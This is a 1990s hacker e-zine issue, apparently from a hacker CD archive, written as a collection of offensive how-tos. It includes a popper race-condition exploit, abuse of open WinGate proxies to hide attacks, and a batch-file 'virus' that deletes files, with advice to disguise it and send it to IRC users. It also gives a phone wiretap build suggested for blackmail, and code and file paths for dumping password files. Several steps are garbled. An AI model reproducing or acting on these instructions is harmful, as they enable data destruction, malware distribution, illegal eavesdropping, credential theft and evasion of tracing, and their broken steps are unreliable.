home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / nkrack1.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  60.4 KB  |  1,747 lines

  1.  KK     KK     RRRRRRR          AAA         CCCCCCCCCC     KK     KK
  2.  KK    KK      RR    R         AA AA        CC             KK    KK
  3.  KKKKKKK       RRRRRRR        AA   AA       CC             KKKKKKK
  4.  KK    KK      RR  RR        AAAAAAAAA      CC             KK    KK
  5.  KK     KK     RR   RR      AA       AA     CC             KK     KK
  6.  KK      KK OO RR    RR OO AA         AA OO CCCCCCCCCCC OO KK      KK OO
  7.  
  8.              
  9.          ||==--Killer Ride And Chilling Kraftwork--==||
  10. --------------------------------------------------------------------------
  11. 
  12. --------------------------------------------------------------------------        
  13. Disclaimer: 
  14.  
  15. We the writers, and or members of K.R.A.C.K. Claim no responsibilty for the 
  16. use of this material. It is intended for educational, and inspirational... 
  17. psyke, just messing, no seriously, we do not recomend that you use any of 
  18. this material, it may lessen your ammount of time in the "free world" 
  19. considerably. So watch out.
  20.  
  21. --------------------------------------------------------------------------
  22. 
  23. --------------------------------------------------------------------------
  24. Index:
  25.  
  26. - Intro
  27. - Hacking
  28. - Hacking II
  29. - Hacking III
  30. - Phreaking
  31. - Kracking
  32. - Anonomizer
  33. - Unix Hacking
  34. - IP-Spoofing
  35. - Info for beginning Unix Hackers
  36. - Messin with tha president!
  37. - Tips From Sygma
  38. - List of members
  39. - Closing notes
  40.  
  41.  
  42. ---------------------------------------------------------------------------
  43. 
  44. ---------------------------------------------------------------------------
  45. Intro:
  46.  
  47. WEEEEEEEEEEEEEEEEEERRRRRRRREEEEEEEEEEEEE BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCKK
  48. DID YOU MISS US???
  49.  
  50. Yup thats right, K.R.A.C.K. is coming back full strength, and more. All new
  51. members, all new webpages, all new ideas. First let me fill you in on our
  52. new policy.
  53.  
  54. DESCRIPTION OF THE NEW KRACK:
  55.     The New Krack is the reviving of the old Krack with the intention to
  56. give the publice a realistic perception of "real" hackers. And not what the
  57. media has made us out to be. However, we will not be centered around hacking
  58. we will also program, trade warez, and other interesting things. This org.
  59. will be for the motivated only, unless you fit this description, dont even
  60. think about it.
  61.  
  62.  
  63. EXPECTATIONS OF ALL MEMBERS:
  64. All members are expected to contribute to KRACK... Which means writing at 
  65. least one text for the e-zine a month, AND/OR in the case of a *special* 
  66. membership agreement you must obide by that special agreement. Failure to 
  67. do this will result in probation and possible banning from this organization. 
  68. These standards may seem harsh but we plan to have a long lasting, strong, 
  69. organization, and to do so we cant tolerate slackers.
  70.  
  71.  
  72.  
  73. FUTURE PLANS:
  74.     Our future plans include the following: a newsletter that will be put
  75. out monthly, a 1-800 # bbs, a new irc server, possibly a convention this 
  76. summer, and maybe a ftp and telnet site.
  77.  
  78.  
  79.  
  80. That About sums up the NEW COMPLETELY REVISED K.R.A.C.K
  81.  
  82. -NeTDeViL DocKooL
  83.  
  84. ---------------------------------------------------------------------------
  85. 
  86. ---------------------------------------------------------------------------
  87.  
  88. Hacking:
  89.  
  90.  
  91. ********************************************
  92. * Popper Exploit : By DocKool of K.R.A.C.K *
  93. ********************************************
  94.  
  95. ************
  96. *  About   *
  97. ************
  98.  
  99. This file will explain to you how to root owned files on shells using the 
  100. popper daemon. If you do not have a shell login on systems that have 
  101. var/spool/mail mode 'drwsrwxrwt' then please dont try whats in this text 
  102. cause it wont work. This file may be a little too technical for most 
  103. beginner's, but im not good at explaining things so dont bitch at me!
  104.  
  105.  
  106. **************
  107. * What to do *
  108. **************
  109.  
  110. #line 59 of pop_dropcopy.c:
  111. # currently running as root: (POP_TMPDROP is /usr/spool/mail/tmpXXXXXX)
  112.  
  113. >    strcpy(template,POP_TMPDROP);
  114. >    (void) mktemp(template);
  115.  
  116. # Now you begin
  117. # If a user guesses the pathname in "template", they probably made a link to 
  118. # /etc/nologin, instead of using a script to exploit this bug you can verify # wether it exists or not by adding sleep(30) here -- after the mktemp(). 
  119. # Obviously you need root to accomplish this task... 
  120.  
  121. >    if ( (tf=fopen(template,"w+")) == NULL ) {  /* failure, bail out    */
  122. >        pop_log(p,POP_PRIORITY,
  123. >            "Unable to create temporary temporary maildrop '%s': %s",template,
  124. >                (errno < sys_nerr) ? sys_errlist[errno] : "") ;
  125. >        return pop_msg(p,POP_FAILURE,
  126. >        "System error, can't create temporary file.");
  127. >    }
  128.  
  129. # Right about here the file was probably created. 
  130.  
  131. >    /* Now give this file to the user   */
  132. >    (void) chown(template,pwp->pw_uid, pwp->pw_gid);]
  133. >    (void) chmod(template,0600);
  134. >       /* Now link this file to the temporary maildrop.  If this fails it
  135. >     * is probably because the temporary maildrop already exists.  If so,
  136. >     * this is ok.  We can just go on our way, because by the time we try
  137. >     * to write into the file we will be running as the user.
  138. >     */
  139. >    (void) link(template,p->temp_drop);
  140. >    (void) fclose(tf);
  141. >    (void) unlink(template);
  142.  
  143. >    /* Now we run as the user. */
  144. >    (void) setuid(pwp->pw_uid);
  145. >    (void) setgid(pwp->pw_gid);
  146.  
  147. **********
  148. *  Note  *
  149. **********
  150.  
  151. If your /var/spool/mail is mode 'drwsrwxrwt' this code isn't necessary. 
  152. Remove lines 59-82 of pop_dropcopy.c.  This doesn't entirely solve the 
  153. problem, especially if root reads their mail via popper.  The best solution 
  154. is to not have /var/spool/mail with world write permissions, as this same type 
  155. of problem exists in atleast one delivery agent (/bin/mail), and probably in 
  156. user agents.
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163. ~~~~Added By DocKool~~~~
  164. --------------------------------------------------------------------------
  165. 
  166. --------------------------------------------------------------------------
  167.  
  168. Hacking II:
  169.  
  170.  
  171.  
  172.                BlueRains WinGate Page
  173.            (ready to hack without being caught?)
  174.  
  175.                [Hide your IP trail]
  176.  
  177.         Another discovery by the BR Networking Team
  178.  
  179. ---------------------------------------------------------------------------
  180.  
  181. What is WinGate?
  182.  
  183. WinGate is a like Proxy / Gateway server. It allows many Windows based PC's
  184. to connect to the internet all at once, using just one dial up or permanent
  185. connection with few limitations over that of a single PC with an internet
  186. link.
  187.  
  188. Goto the WinGate home page if you want to learn more about WinGate or
  189. download it (highly suggested).
  190.  
  191. ---------------------------------------------------------------------------
  192.  
  193. What can WinGate do for me?
  194.  
  195. WinGate has a major flaw with its default installation. It allows you to
  196. hide your IP address, by routeing whatever you are doing through someone
  197. else's machine running WinGate.
  198.  
  199. Basically... a lame hackers way of IP Spoofing (but it works!!!). And the
  200. best part is... WinGate keeps NO logs!!! So they (the site you route
  201. through) dont even know you are doing it unless they are watching (highly
  202. unlikely). And even then, they may not even realise what is happening. And
  203. even then, they have NO way to prove you did it!!!
  204.  
  205. ---------------------------------------------------------------------------
  206.  
  207. What can I do through WinGate?
  208.  
  209. You route through Wingate, by connecting to the persons machine running
  210. Wingate.
  211.  
  212. Netscape, IE both allow you to point your browser to route through another
  213. machine (like one running Wingate). You can route FTP and HTTP through
  214. Netscape and IE through a machine running WinGate.
  215.  
  216. See the "Options/Network Preferences/Proxies/Manual Proxy Configuration"
  217. option for Netscape.
  218. See the "View/Options/Proxy Server/Settings" option for Internet Explorer.
  219.  
  220. To Telnet though a WinGate machine, just telnet to the machine running
  221. WinGate, and you will be greeted with this prompt 'WinGate>'
  222.  
  223. Then just type 'x.x.x.x yyyy' or 'zzzzzzz yyyy' or 'zzzzzzzz' or 'x.x.x.x'
  224. where x.x.x.x is the machine you want to logon to's ip number, zzzzzzzz is
  225. its DNS name and yyyy is the port you wish to connect to. ie: '193.25.41.3
  226. 25' will take you to the machine at 193.25.41.3 at port 25 and
  227. 'www.microsoft.com 21' will take you to microsoft at port 21 (ftp port).
  228.  
  229. ---------------------------------------------------------------------------
  230.  
  231. What ports can I route through, via a WinGate machine?
  232.  
  233. Default Wingate installation ports:
  234.  
  235. 21 FTP
  236. 23 Telnet
  237. 80 WWW
  238. 110 POP3
  239. 1080 SOCKS4
  240. 1090 RealAudio
  241.  
  242. ---------------------------------------------------------------------------
  243.  
  244. How does this hide my IP address?
  245.  
  246. There are 3 machines involved when you want to hack a site and hide your ip
  247. via Wingate.
  248.  
  249. Your machine (me.isp.com), the machine running WinGate you are going to
  250. route to (wingate.dummy.com), and the machine you want to hack
  251. (www.nasa.gov).
  252.  
  253. Now, if you route through the wingate.dummy.com, it will look like
  254. wingate.dummy.com is the machine that is connected to www.nasa.gov. So
  255. www.nasa.gov's logs will show up a connection from wingate.dummy.com and
  256. not from me.isp.com.
  257.  
  258. The reason this happens, is the wingate.dummy.com site, has a few pc's,
  259. which all connect out of their local lan, via their wingate.dummy.com
  260. machine (through Wingate) and out onto the net. Now, you are connecting to
  261. their WinGate machine just like the machines on their local network
  262. (*.dummy.com).
  263.  
  264. So you come into wingate.dummy.com from the internet, not their local
  265. network, and then go back out onto the net, as the machines on their local
  266. network do. This is because, WinGate does not stop machines coming in and
  267. going back out from the internet. Nice design flaw.
  268.  
  269. ---------------------------------------------------------------------------
  270.  
  271. Common questions
  272.  
  273. Q. Does WinGate have to be running on my machine?
  274. A. No, you are using the copy of WinGate running on someone elses machine
  275. (on the internet) to hide your IP address from the site you want to hack,
  276. so it looks like you are coming from the site running WinGate.
  277.  
  278. Q. Can I be traced when I connect to someones machine running WinGate?
  279. A. Your IP address will show up in one window on WinGate (download WinGate
  280. to see) machine, but it is not logged, and the site running WinGate cannot
  281. tell what you are connecting to from them.
  282.  
  283. Q. Does this work for all versions of WinGate?
  284. A. Currently YES. But version 2 of WinGate is due out soon, which will
  285. incorporate logging and access controls. Thus, sites running version 2 will
  286. be useless to hide your tracks.
  287.  
  288. Q. Does WinGate run on Win 3.1 / Win 95 / Win NT
  289. A. Yes.
  290.  
  291. Q. How do I find a machine running WinGate to route though?
  292. A. Thats up to you to figure out... happy hunting
  293.  
  294. Q. I want to use WinGate for my own lan, is this safe?
  295. A. No, it is not safe. Rather use Microsofts Proxy Server (much better than
  296. WinGate, but still in beta, but it does provide better net connection,
  297. logging and access controls. Requires Windows NT 4).
  298.  
  299. Q. Is there a registration crack out for Wingate?
  300. A. Yes, it works for most versions. Download it here: WinGate Crack
  301.  
  302. ---------------------------------------------------------------------------
  303.  
  304. So what now?
  305.  
  306. Well, now its time for you to go out and find machines running Wingate...
  307. and begin hiding your ip trail...
  308.  
  309. ---------------------------------------------------------------------------
  310.  
  311. Contact: BlueRain
  312. Contact: BlueRain
  313. (c) 1996 - BR Networking Team             [Powered by MicroSoft BackOffice]
  314.  
  315.  
  316.  
  317. ~~~~Added By BlueRain~~~~
  318. ---------------------------------------------------------------------------
  319. 
  320. ---------------------------------------------------------------------------
  321. Hacking III:
  322.  
  323.             *****************************
  324.             * How to make a Batch Virus *
  325.             *        By DocKool         *
  326.             *            &              *
  327.             *         NeTDeViL          *
  328.             *****************************
  329.         K.R.A.C.K.   Killer Ride And Chilling Kraftwork
  330.  
  331.  
  332.  
  333. Ok, In this text we will explain to you how to make a virus, like a trojan 
  334. horse, in a Batch file. Its quite easy... If you know anything about the 
  335. DOS commands (I hope for your sake you do). Anyways back to the virus. 
  336. First open up Notepad.exe or use dos's very handy editor (or any other 
  337. text editor you have), next do the following; (any line beginning with 
  338. a * is us)
  339.  
  340. ECHO OFF 
  341. *this stops the user from seeing what the batch file is doing
  342. CD\
  343. *This will bring the virus to DOS and into the defualt drive.
  344.  
  345. ECHO Y | del c:\test\*.*
  346. *This will delete all files in the test directory. 
  347. It will not delete the sub directories in the test directory! 
  348. So then you must ad a line like this;
  349.  
  350. ECHO Y | del c:\test\sub\*.*
  351.  
  352. *That will delete all the files in the test\sub directory now, 
  353. you can imagine the possibilities, of all the directories you could delete. 
  354. For instance if you wanted, you could make a Winblows, mIRC, or Netscape 
  355. virus, that would say;
  356.  
  357. ECHO Y | del c:\netscape\*.*
  358.  
  359. *You get the picture? Next you will want to add something like this;   
  360.  
  361.  
  362. ECHO HAHA YOU LOOZER I FUCKED YOU UP YOU SUNUVABITCH
  363.  
  364. * this will display HAHA YOU LOOZER.... in dos and the user will be wondering
  365. what the hell your talkin about.
  366.  
  367.  
  368. *Now save your file to .bat (virus.bat). After that you want to obtain a 
  369. program called bat2exec.com this program will turn your .bat file into 
  370. an .exe we will have one available from the krack web site.
  371.  
  372. *When all done, you can play around with it a little, make a virus, 
  373. and save it as porno.exe, then go in the porno channels on IRC and 
  374. send it to some horny lamer. Or make a  zip file and put your virus 
  375. in with a name like install.exe, also put some other garbage files 
  376. in there so the zip will apear bigger. Next go in some warez channel 
  377. and claim that the zip is a great game. The possibilities are endless, 
  378. just use your imagination. (this works really well in channelst with 
  379. fserve available so you can plan each and every directory. :)
  380.  
  381. *The following is an example virus that would kill a directory called c:\test
  382.  
  383.  
  384. ECHO OFF
  385. CD\
  386. ECHO Y | del c:\test\*.*
  387. ECHO Y 
  388. cls
  389. echo. I just fucked up your test directory!!!
  390. echo. Dont you feel dumb???
  391.  
  392. *Try making some virus's like this and set them up to delete directories you 
  393. dont care about, like c:\test\ Thats the best way ive found to troubleshoot 
  394. your virus. Good luck!!!
  395.  
  396.  
  397. USAGE:
  398. The posibilities for this are limitless, and any moron can do it. If you
  399. could get a bat file that will reboot the cpu, and give it to somebody on
  400. irc, you could take their channel. You could get it to copy a bullatin 
  401. boards password file into the download forum, and then pop in and download
  402. it, you could get this thing to do about anything. 
  403.  
  404. By the way, if you do come up with a way to get the bat file to reboot
  405. the system, please email us, or if you have any updates to this file,
  406. email us. (email addresses listed below)
  407.  
  408.  
  409.  
  410. ~~~~Added By DocKool & NeTDeViL~~~~
  411. ---------------------------------------------------------------------------
  412. 
  413. ---------------------------------------------------------------------------
  414. Phreaking:
  415.  
  416.  
  417. DeViLBoX
  418.           ^^^^^^^CReaTeD By NeTDeViL^^^^^^^
  419.          Brought to you by K.R.A.C.K
  420.              Da K-Rad Hack Society
  421. 
  422.  
  423.             Disclaimer
  424. This box was written for entertainment, and educational purposes
  425. only. I do not recomend you use any of this information. And i 
  426. claim no responsibilty for your actions. Neither does K.R.A.C.K
  427. or any of its members. So dont be a moron and use this info wisely.
  428.  
  429.  
  430.                What you need
  431.  
  432. A phone you can "Modify"
  433. A walkman with recording capabilites
  434. headphones
  435. some copper wire
  436. some electric tape
  437. an electric switch
  438.  
  439.  
  440.             Purpose
  441.  
  442. Yes i know this box is a lot like others youve read, but it uses some 
  443. concepts from other boxes, with my own little satanic twist. So read and
  444. enjoy.
  445. First you need to read the beige box and modify your phone acordingly. when
  446. thats done then complete the following instrucions and you will have your
  447. devil box.
  448.  
  449.  
  450.         What a DevilBox does
  451.  
  452. well the devil box taps phones without a trace. Normally when tapping a phone 
  453. you can be heard on both ends because your phone reduces the ammount of 
  454. voltage running thru the line. Also you will be able to record the phone 
  455. conversations for blackmailing. 
  456.  
  457.  
  458.             How To
  459.  
  460. ok now youve got your beige box and your ready for the devil box. first 
  461. things first. we need to fix the phone with a mute switch. what you need
  462. to do is open the reciever of your phone, and locate the microphone. there
  463. should be two wires connecting microphone to the board. Cut one of these in 
  464. half, then strip the wire on both ends. use the electric tape to bond the
  465. half of the wire that is connected to the microphone to a 3 inch piece of
  466. copper wire. then connectthe other end of the copper wire to the electric 
  467. switch, and the half of the wire that is connected to the board should be
  468. connected to the other side of the electric switch. Now you should have a 
  469. mute switch. Now when the switch is open and you pick up the phone it should
  470. cause 0 resistance, making you untracable. 
  471. heres the diagram
  472.              switch
  473.               |
  474.               |              |-------------------|
  475.               |              |                   |
  476.     microphone  |||------o/o-------------|-                  |
  477.         |||----------------------|-                  |
  478.              ^               |___________________|
  479.              |
  480.              |
  481.           2 wires connecting mike to board
  482.  
  483.  
  484. now you need to locate the speaker in the reciever
  485. there should be 2 wires leading into this too. Snip these 2 wires in half
  486. at this point you can throw away the speaker you wont need it. Then strip
  487. both of the wires still connecting to the board. Add copper extensions to 
  488. these wires. now open up your walkman. There should be two wires leading
  489. from the spot where you can insert a mircrophone. Snip these and connect
  490. the copper extensions to the halves of the wires that connect to the green
  491. board. now plug in your headphones. now with the switch closed you should be
  492. able to hear yourself talking into the phone through the headphones. and with
  493. the switch up you shouldnt be able to hear yourself, just the dialtone. if
  494. so youve correctly constructed the devil box. Now just insert a tape and when
  495. you eavsdrop you can record it. Congradulations.
  496.  
  497.  
  498.                 Possible uses
  499.  
  500. If you are bothering to read this section your an idiot, its obvious what
  501. you use this box for.
  502.  
  503.  
  504.  
  505. ~~~~Added By NeTDeViL~~~~
  506. ---------------------------------------------------------------------------
  507. 
  508. ---------------------------------------------------------------------------
  509. Kracking:
  510.  
  511.  
  512.  
  513.  
  514.  
  515.  
  516. ---------------------------------------------------------------------------
  517. 
  518. ---------------------------------------------------------------------------
  519.  
  520. ANONOMIZER:
  521.  
  522.  
  523. You may have seen numerous advertisements on the net for a security web site
  524. called Anonymizer(http://www.anonymizer.com).  The web page claims to hide 
  525. your IP trail, to fool the logs.  At first glance, every hacker in the world 
  526. thought, "YES!! NO MORE TELNET BOUNCING!!!", but alas, it isn't as secure as 
  527. it seems. The whole idea behind Anonymizer is a CGI script that basically 
  528. telnet bounces, but through the World Wide Web port.  It has the same 
  529. principles, but the WWW port is set up different than the telnet, so it has 
  530. faults.  I was recently privied to an IP log of a major server(to remain 
  531. nameless) and you could easily pick out the Anonymizer users.  The truth is, 
  532. Anonymizer leaves an IP trail the size of the Great Wall of China, all ending 
  533. with your original IP.  Anonymizer is good to fool those java applets that 
  534. show who you are, but not much else. So before you go and try to use it, 
  535. think to yourself, "Do I want my IP on the logs?" If you don't care, be my 
  536. guest and use it.  But if you are gonna try something nasty, be careful.
  537.  
  538.          -=-_-=disLeXiC=-_-=-
  539.  
  540.  
  541.  
  542.  
  543. ~~~Added By disLeXiC~~~~
  544. ---------------------------------------------------------------------------
  545. 
  546. ---------------------------------------------------------------------------
  547.  
  548. UNIX HACKING:
  549.  
  550.  
  551.  
  552.  
  553.  
  554. * What is KRACK? *
  555.  
  556. we are the true 'cyberkings'
  557. the owners of the world
  558. the elite of the elite
  559. the Bill clintons of the net
  560. we will choose our destiny
  561. and the nets destiny              
  562. because we are hackers        
  563. We Are KRACK!                 
  564. --------------------------------------------------------------------------------
  565. Stradegie For Getting Root With a shadowed Passwd
  566.  
  567. step#1
  568.  
  569.  
  570. anonymous ftp into the server get passwd
  571.  
  572. step #2 
  573.  
  574.     To defeat password shadowing on many (but not all) systems, write a
  575. program that uses successive calls to getpwent() to obtain the
  576. password file.
  577.  
  578. Example:
  579.  
  580. #include <pwd.h>
  581. main()
  582. {
  583. struct passwd *p;
  584. while(p=getpwent())
  585. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
  586. p->pw_passwd,
  587. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
  588. p->pw_shell);
  589. }
  590.  
  591. Or u can Look for the Unshadowed Backup.....
  592.  
  593. Unix                            Path                    needed  Token
  594. ----------------------------------------------------------------------
  595. AIX 3                       /etc/security/passwd                 !
  596.        or                   /tcb/auth/files/<first letter        #
  597.                 of username>/<username>
  598. A/UX 3.0s                   /tcb/files/auth/?/                   *
  599. BSD4.3-Reno                 /etc/master.passwd                   *
  600. ConvexOS 10                 /etc/shadpw                          *
  601. ConvexOS 11                 /etc/shadow                          *
  602. DG/UX                       /etc/tcb/aa/user/                    *
  603. EP/IX                       /etc/shadow                          x
  604. HP-UX                       /.secure/etc/passwd                  *
  605. IRIX 5                      /etc/shadow                          x
  606. Linux 1.1                   /etc/shadow                          *
  607. OSF/1                       /etc/passwd[.dir|.pag]               *
  608. SCO Unix #.2.x              /tcb/auth/files/<first letter        *
  609.                 of username>/<username>
  610. SunOS4.1+c2                 /etc/security/passwd.adjunct         ##username
  611. SunOS 5.0                   /etc/shadow
  612.                 <optional NIS+ private secure
  613.                 maps/tables/whatever>
  614. System V Release 4.0        /etc/shadow                          x
  615. System V Release 4.2        /etc/security/* database
  616. Ultrix 4                    /etc/auth[.dir|.pag]                 *
  617. UNICOS                      /etc/udb    
  618.  
  619.  
  620.  
  621. Step #3
  622.  
  623. crack it
  624.  
  625. step #4
  626. login and type this
  627.  
  628. /usr/local/bin/suidperl 
  629.  
  630. chmod 4700 schperl.pl
  631.  
  632. now we have root perms...!!!!!!!!!!!!!!!
  633. =======================================
  634. C-ya everyone hope u ENjoy,
  635.  
  636.  
  637. OD^PHREAK
  638.  
  639.  
  640. ~~~~Added By OD^PHREAK~~~~
  641. ---------------------------------------------------------------------------
  642. 
  643. ---------------------------------------------------------------------------
  644.  
  645. IP-Spoofing:
  646.  
  647.  
  648.  
  649.           "WHAT IS SPOOFING" IN LAMENS TERMS- By NeTDeViL
  650.           =============================================
  651.  
  652. Now I know most of us already know this one, but if you sit in #hackteach
  653. on undernet long enough, your chances of seein some lamer come in and ask
  654. about an IP-Spoofer are pretty high. So if you want to know what this is
  655. SHUTUP AND READ DAMNIT!
  656.  
  657.  
  658. SPOOFING- An attempt to gain access to a system by posing as an authorized
  659. user.  
  660.  
  661. Now for a more detailed explenation.
  662.  
  663. Say Joe@some.domain.com wants to log into ftp.lamers.org and download their
  664. password file. He couldnt do this under normal conditions (unless using a 
  665. hacked shell) because they would simply check their logs and see who it was.
  666. Now Joe dont wanna get caught so he loads up is IP-Spoofer, and it changes
  667. his ip address to Hacker@some.domain.com. Now even his ISP thinks he is 
  668. hacker@some.domain.com. So now he goes to ftp.lamers.org and downloads their
  669. passwd file. Then disconnects. and cracks the file. Meanwhile lamers.org is
  670. sitting here looking through their logs at whodunnit. up comes 
  671. hacker@some.domain.com. they call some.domain.com up, and they dont know who
  672. it was either, since most likely there wont be a hacker@some.domain.com so
  673. joe is sittin high and dry so to speak.
  674.  
  675.  
  676. Q.)   Do IP-Spoofers really exist?
  677.  
  678. A.)   Yes, but only for systems that use a Unix based OS.  The reason for 
  679. this is when you try to run a spoofer, it closes winsock.dll. And your not 
  680. connected anymore, so it doesnt work. But they come for most unix based 
  681. systems.
  682. ---------------------------------------------------------------------------
  683. Q.)   How do i find a spoofer?
  684. A.)   The web sure comes in handy sometimes... 
  685.       i just love those search engines.
  686.       Our page is wrather interesting too, i think im gonna upload
  687.       some software to it pretty soon.
  688. One place i found with a GOOD IP Spoofer that actually Works is at...
  689.          HTTP://ww2.succeed.net/~coder
  690.  
  691.  
  692.  
  693.  
  694. ~~~~Added By NeTDeViL~~~~
  695. ---------------------------------------------------------------------------
  696. 
  697. ---------------------------------------------------------------------------
  698.  
  699. Info for beginning Unix Hackers:
  700.  
  701.  
  702. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
  703. |
  704. |
  705. |
  706. |
  707. |                       So You Wanna Be a HACKER?
  708. |
  709. |
  710. |                               By Defiant
  711. |                          Member of K.R.A.C.K
  712. |++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  713.  
  714.  
  715. Purpose of this file:
  716.  
  717.     To inform those of you out there that "think" your hackers what a true
  718. hacker is and how to be one. And to inform those of you who want to be a 
  719. hacker why you should or shouldn't be one depending on what your views are
  720. of a hacker. But basically its an absolute beginners guide to hacking.
  721.  
  722.  
  723.  
  724. Contents:
  725.  
  726. Section 1  Why do you want to be a hacker?
  727. Section 2  What do you think a hacker is?
  728. Section 3  Read this manifesto!
  729. Section 4  What you need to start on your quest
  730. Section 5  Lets get started!
  731. Section 6  Navigating Unix
  732.     
  733.  
  734.  
  735.  
  736.  
  737. *********************************************************************
  738.  
  739.  
  740.             S E C T I O N   1
  741.         Why do you want to be a hacker?
  742.  
  743.  
  744.     Before you get started ask yourself why you want to pursue the art of
  745. hacking. Are curious about whats out there? Do you want to cause havok? 
  746. Revenge? To Learn? 
  747.     If your goal is to crash a system or steal something (unless its information
  748. that should be free!)  then stop right now and read the manifesto in section 3.
  749. If your goal is to uncover information, learn, or your just curious about the
  750. possiblilities of the internet and its intriquit networks and varieties of systems,
  751. then you are ready to learn this sacred art!
  752.  
  753.  
  754. *********************************************************************
  755.  
  756.  
  757.                S E C T I O N    2
  758.         What do you think a Hacker is?
  759.  
  760.     Now that you know why you want to be a hacker you need to know what a
  761. TRUE hacker really is. 
  762.     There are those who think they are hackers and those who ARE hackers.
  763. Those who think they are, are the criminals who waste precious time to steal
  764. card #'s, crack games, mail bomb someone (now that is lame), or just trash
  765. a system. They are the TRUE LAMERZ. The true hacker is in a pursuit to 
  766. fulfill his curiosity or to gain knowlege that others do not possess
  767. (or knowledge that SHOULD be free) and once you have knowlege you have power!
  768. Which i just now realized is probably most hackers real purpose, to feel power
  769. over someone or some system. Glad i'm writing this file because even I am 
  770. learning as I write this. Here are some rules to use when you become a hacker:
  771.  
  772.  
  773.  
  774.  
  775. 1.      Never damage any system. This will only get you into trouble.
  776.  
  777. 2.      Never alter any of the systems files, except for those needed to
  778. insure that you are not detected, and those to insure that you have
  779. access into that computer in the future.
  780.  
  781. 3.      Do not share any information about your hacking projects with
  782. anyone but those you'd trust with your life.
  783.  
  784. 4.      When posting on BBS's (Bulletin Board Systems) be as vague as
  785. possible when describing your current hacking projects.  BBS's CAN
  786. be monitered by law enforcement.
  787.  
  788. 5.      Never use anyone's real name or real phone number when posting
  789. on a BBS. 
  790.  
  791. 6.      Never leave your handle on any systems that you hack in to.
  792.  
  793. 7.      DO NOT hack government computers.
  794.  
  795. 8.      Never speak about hacking projects over your home telephone line.
  796.  
  797. 9.      Keep all of your hacking materials in a safe place.
  798.  
  799. 10.     To become a real hacker, you have to hack. You can't just sit
  800. around reading text files and hanging out on BBS's. This is not what
  801. hacking is all about.
  802.  
  803.  
  804. *************************************************************************
  805.  
  806.  
  807.                 S E C T I O N   3
  808.                Read this manifesto
  809.  
  810. I think EVERYONE should read this manifesto by the MENTOR.
  811.  
  812.  
  813.                 THE CONCIENCE OF A HACKER
  814.                     BY THE MENTOR
  815.  
  816.  
  817.  Another one got caught today, it's all over the papers.  "Teenager
  818.  
  819. Arrested in Computer Crime Scandal", "Hacker Arrested after Bank
  820.  
  821. Tampering"... Damn kids.  They're all alike. But did you, in your three-
  822.  
  823. piece psychology and 1950's technobrain, ever take a look behind the
  824.  
  825. eyes of the hacker?  Did you ever wonder what made him tick, what forces
  826.  
  827. shaped him, what may have molded him? I am a hacker, enter my world...
  828.  
  829. Mine is a world that begins with school... I'm smarter than most of the
  830.  
  831. other kids, this crap they teach us bores me...  Damn underachiever.
  832.  
  833. They're all alike. I'm in junior high or high school.  I've listened to
  834.  
  835. teachers explain for the fifteenth time how to reduce a fraction.
  836.  
  837. I understand it.  "No, Ms. Smith, I didn't show my work.  I did it in
  838.  
  839. my head..." Damn kid.  Probably copied it.  They're all alike.
  840.  
  841. I made a discovery today.  I found a computer.  Wait a second, this is
  842.  
  843. cool.  It does what I want it to.  If it makes a mistake, it's because I
  844.  
  845. screwed it up.  Not because it doesn't like me...  Or feels threatened by
  846.  
  847. me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be
  848.  
  849. here... Damn kid.  All he does is play games.  They're all alike. And then
  850.  
  851. it happened... a door opened to a world... rushing through the phone line
  852.  
  853. like heroin through an addict's veins, an electronic pulse is sent out,
  854.  
  855. a refuge from the day-to-day incompetencies is sought... a board is found.
  856.  
  857. "This is it... this is where I belong..." I know everyone here... even
  858.  
  859. if I've never met them, never talked to them, may never hear from them
  860.  
  861. again... I know you all... Damn kid.  Tying up the phone line again.
  862.  
  863. They're all alike... You bet your ass we're all alike... we've been
  864.  
  865. spoon-fed baby food at school when we hungered for steak... the bits of
  866.  
  867. meat that you did let slip through were pre-chewed and tasteless.
  868.  
  869. We've been dominated by sadists, or ignored by the apathetic.  The few
  870.  
  871. that had something to teach found us willing pupils, but those few are
  872.  
  873. like drops of water in the desert.
  874.  
  875.    This is our world now... the world of the electron and the switch, the
  876.  
  877. beauty of the baud.  We make use of a service already existing without
  878.  
  879. paying for what could be dirt-cheap if it wasn't run by profiteering
  880.  
  881. gluttons, and you call us criminals.  We explore... and you call us
  882.  
  883. criminals.  We seek after knowledge... and you call us criminals.  We
  884.  
  885. exist without skin color, without nationality, without religious bias...
  886.  
  887. and you call us criminals. You build atomic bombs, you wage wars, you
  888.  
  889. murder, cheat, and lie to us and try to make us believe it's for our
  890.  
  891. own good, yet we're the criminals.
  892.  
  893.    Yes, I am a criminal.  My crime is that of curiosity.  My crime is
  894.  
  895. that of judging people by what they say and think, not what they look like.
  896.  
  897. My crime is that of outsmarting you, something that you will never
  898.  
  899. forgive me for. I am a hacker, and this is my manifesto.  You may stop
  900.  
  901. this individual, but you can't stop us all... after all, we're all alike.
  902.  
  903.             The Mentor
  904.  
  905.  
  906. *************************************************************************
  907.  
  908.  
  909.  
  910.             S E C T I O N   4
  911.           What you need to start hacking.
  912.  
  913.  
  914. Text files. You need to read as many text files as you can get a hold of.
  915. I have loads at http://www.elkhart.net/~sborosh/hacking/text/info.html
  916.  
  917. Programs:
  918.  
  919.     You need a Telnet application to remotely log into another system.
  920. If you are using win95 you have one already. Just go to the start menu and
  921. then to run and in the box type telnet and click ok. If not go to 
  922. http://www.elkhart.net/~sborosh/hacking/filez/qvt.zip to get one.
  923.  
  924.     To transfer files you need an ftp (File Transfer Protocol) program.
  925. Again windows 95 comes with one. But i recommend Cuteftp just search for it
  926. with webcrawler or something.
  927.  
  928. Those are the two main programs you need to navigate your way into systems.
  929.  
  930. MORE FILEZ:
  931.  
  932. Once you get into these systems there are some programs you can run and some
  933. exploits (an exploit is a hole in the security which allows you to gain access)
  934. I have loads of filez at www.elkhart.net/~sborosh/hacking/filez/filez.html
  935. I will explain how to use some of them later in this phile.
  936.  
  937. **************************************************************************
  938.  
  939.              S E C T I O N   5
  940.     Getting started on your journey into the unknown!
  941.  
  942.  
